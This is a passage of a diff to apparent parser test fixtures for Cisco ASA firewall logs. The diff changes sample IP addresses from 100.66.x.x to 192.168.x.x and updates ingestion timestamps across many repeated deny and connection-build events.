+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18028,8 +18028,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18063,7 +18063,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18072,8 +18072,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112050201Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364517600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18104,8 +18104,8 @@
 },
 "destination": {
 "port": 8310,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1306,
@@ -18145,7 +18145,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -18153,8 +18153,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112051881Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310",
+ "ingested": "2021-12-09T13:31:36.364539800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -18187,8 +18187,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18223,7 +18223,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18232,8 +18232,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112053561Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)",
+ "ingested": "2021-12-09T13:31:36.364544300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -18249,7 +18249,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.124.24",
+ "mapped_source_ip": "192.168.124.24",
 "connection_id": "11844",
 "source_interface": "outside",
 "mapped_destination_port": 1306
@@ -18271,8 +18271,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18306,7 +18306,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18315,8 +18315,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112055226Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364549500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18352,8 +18352,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18387,7 +18387,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18396,8 +18396,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112056870Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364553700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18433,8 +18433,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18468,7 +18468,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18477,8 +18477,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112058568Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364557800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18514,8 +18514,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18549,7 +18549,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18558,8 +18558,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112060213Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364562Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18595,8 +18595,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18630,7 +18630,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18639,8 +18639,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112061881Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364566600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18676,8 +18676,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18711,7 +18711,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18720,8 +18720,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112063520Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364570800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18757,8 +18757,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18792,7 +18792,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18801,8 +18801,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112065209Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364575Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18838,8 +18838,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18873,7 +18873,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18882,8 +18882,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112067085Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364579600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18919,8 +18919,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18954,7 +18954,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18963,8 +18963,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112068731Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364584300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19000,8 +19000,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19035,7 +19035,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19044,8 +19044,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112070434Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364589Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19081,8 +19081,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19116,7 +19116,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19125,8 +19125,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112072281Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364592700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19162,8 +19162,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19197,7 +19197,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19206,8 +19206,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112073890Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364596400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19243,8 +19243,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19278,7 +19278,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19287,8 +19287,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112075545Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364601Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19324,8 +19324,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19359,7 +19359,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19368,8 +19368,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112077210Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364606800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19405,8 +19405,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19440,7 +19440,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19449,8 +19449,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112078941Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364612600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19486,8 +19486,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19521,7 +19521,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19530,8 +19530,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112080595Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364618400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19567,8 +19567,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19602,7 +19602,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19611,8 +19611,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112082328Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364624100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19648,8 +19648,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19683,7 +19683,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19692,8 +19692,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112083980Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364628400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19729,8 +19729,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19764,7 +19764,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19773,8 +19773,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112085665Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364632900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19810,8 +19810,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19845,7 +19845,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19854,8 +19854,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112087314Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364637200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19891,8 +19891,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19926,7 +19926,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19935,8 +19935,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112089014Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364642200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19972,8 +19972,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20007,7 +20007,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20016,8 +20016,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112090667Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364646700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20053,8 +20053,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20088,7 +20088,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20097,8 +20097,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112092366Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364651300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20134,8 +20134,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20169,7 +20169,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20178,8 +20178,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112093994Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364655400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20215,8 +20215,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20250,7 +20250,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20259,8 +20259,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112095648Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364659400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20296,8 +20296,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20331,7 +20331,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
